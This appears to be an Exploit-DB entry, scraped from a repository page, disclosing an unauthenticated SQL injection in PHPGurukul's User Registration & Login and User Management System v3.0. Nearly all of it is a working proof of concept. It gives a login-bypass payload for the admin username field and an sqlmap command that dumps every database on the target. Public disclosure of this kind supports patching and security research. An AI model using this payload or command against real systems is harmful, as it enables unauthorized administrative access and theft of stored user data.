fe2c42ff0e
4 changes to exploits/shellcodes/ghdb User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated) User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS) Uvdesk 1.1.4 - Stored XSS (Authenticated)
39 lines
No EOL
987 B
Text
39 lines
No EOL
987 B
Text
# Exploit Title: User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)
|
|
# Google Dork: NA
|
|
# Date: 19/08/2023
|
|
# Exploit Author: Ashutosh Singh Umath
|
|
# Vendor Homepage: https://phpgurukul.com
|
|
# Software Link:
|
|
https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
|
|
# Version: 3.0
|
|
# Tested on: Windows 11
|
|
# CVE : Requested
|
|
|
|
|
|
Proof Of Concept:
|
|
|
|
1. Navigate to the admin login page.
|
|
|
|
URL: http://192.168.1.5/loginsystem/admin/
|
|
|
|
2. Enter "*admin' -- -*" in the admin username field and anything
|
|
random in the password field.
|
|
|
|
3. Now you successfully logged in as admin.
|
|
|
|
4. To download all the data from the database, use the below commands.
|
|
|
|
4.1. Login to the admin portal and capture the request.
|
|
|
|
4.2. Copy the intercepted request in a file.
|
|
|
|
4.3. Now use the below command to dump all the data
|
|
|
|
|
|
Command: sqlmap -r <file-name> -p username -D loginsystem --dump-all
|
|
|
|
|
|
|
|
Thanks and Regards,
|
|
|
|
Ashutosh Singh Umath |